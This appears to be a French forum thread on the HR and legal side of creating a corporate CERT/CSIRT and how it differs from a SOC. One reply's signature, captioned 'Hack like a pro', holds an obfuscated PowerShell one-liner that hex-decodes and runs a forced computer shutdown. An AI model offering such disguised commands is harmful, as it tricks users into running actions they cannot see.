Annonce

Réduire
Aucune annonce.

Mise en oeuvre d'un CERT

Réduire
X
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Mise en oeuvre d'un CERT

    Bonjour,
    Je m'interroge sur les obligations "légales" pour mettre en oeuvre une équipe CERT dans une entreprise.

    En effet pour faire les choses dans les règles de l'art, il me semble qu'un passage devant les instances du personnel va être obligatoire afin de décrire les missions, les moyens et les changements que vont induire la présence de cette nouvelle équipe dans l’entreprise.

    En effet les équipes CERT vont faire du "flicage" de salariés à travers différents outils, notamment de la collecte de logs d'activité ou autre.

    Bien évidemment l'éco système d'une entreprise repose aussi sur les droits des salariés, et leur information par rapport aux outils et équipes qui pourraient "enquêter" sur leur activité.

    Quelqu'un sur le forum a-t-il un site de référence avec des cadres posées pour ce genre de situation ?
    Ou des idées, situations comparables ?

    Les fiches de missions de l'équipe CERT sont finalisées, le mandat pour leurs actions est dans les mains de la direction générale mais quid des obligations vis à vis des salariés "lambda" qui vont indirectement se retrouver surveillés ... même si les enquêtes sont très encadrés, on a un devoir d'information envers l'ensemble des collaborateur.

    On est en France et pas en Union soviétique en plein guerre froide, je suis donc de nature prudent avec ce genre de sujet.
    Une modification du règlement intérieur et une information personnelle aux salariés manipulant des éléments sensibles me semble indispensable.

    Merci d'avance.
    PS: si c'est pas la bonne section, n'hésitez pas à déplacer mon poste.


  • #2
    Hello,

    Dans un premier temps je pense que tu confonds la fonction de CERT/CSIRT et du SOC.
    La partie que tu décris dans ton post (rôle de détection) est plutôt assurée par les SOC en général. Le CERT est là pour faire de la réponse a incident, il a plus un rôle de pompier que de surveillance.

    En ce qui concerne le SOC, la plupart des détections sont automatisées via les marqueurs présents dans le SIEM (https://en.wikipedia.org/wiki/Securi...ent_management). Il n y a donc pas de flicage humain à proprement parler.
    Alors effectivement il peut être très bien d’expliquer aux employés "lambda" le rôle du SOC et du CERT, bien leur faire comprendre que le rôle n'est pas de les surveiller eux, mais de surveiller les menaces.
    Si cela t'intéresse je te donne un lien vers un PDF sur CLUSIF qui explique comment mettre en place un SOC, il y a une section "Vendre le projet SOC a son entreprise" qui pourrait t’intéresser : https://clusif.fr/publications/reuss...ement-dun-soc/

    J’espère t'avoir donné une piste de réponse avec tout ça

    ++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++.>+.+++++++..+++.>++.<<+++++++++++++++.>.+++.------.--------.>+.>.

    Commentaire


    • #3
      Coucou,
      Merci pour ta réponse, il s'agit bien de l'aspect RH de cette nouvelle équipe.

      Le CSIRT / CERT interviendra en effet uniquement à la demande de l'inspection générale pour "investiguer" sur des activités suspectes, et donc indirectement pointer du doigt le / les collaborateur(s) qui ont le cas échéant déconné(s). C'est là qu'on va surement revoir le règlement intérieur pour blinder ces aspects d'un point de vue RH.

      La mise en place du SOC est terminée depuis quelques temps d'un point de vue architecture et j'enrichis les scénarios de détection au fur et à mesure des analyses de risques détaillées que je mène sur les biens essentiels à protéger. Merci pour le lien.

      A+

      Commentaire


      • #4
        Salut,

        Tu as clairement bien compris les enjeux.

        Coté juridique t'es plutôt tranquille dans la mesure ou l'utilisation du SI par les employés de l'entreprise est considéré par défaut comme professionnelle.
        L'entreprise se doit d'ailleurs, par exemple, de conserver "l'historique de navigation" (les logs proxy quoi) des employés pendant 1 an. (Et se fera sévèrement défoncer en cas d'impossibilité de réponse à une réquisition judiciaire).

        Coté RH donc, tu peux vérifier deux trucs :
        - Les analystes de ton soc ont une close de confidentialité bien comprise dans leur contrat (dans la mesure ou ils vont potentiellement avoir des trucs craignos entre les mains).
        - Une info précise circule auprès des salariés, genre via la charte d'utilisation des moyens informatiques de l'entreprise (surtout si vous faites du déchiffrement SSL/TLS).
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire

        Chargement...
        X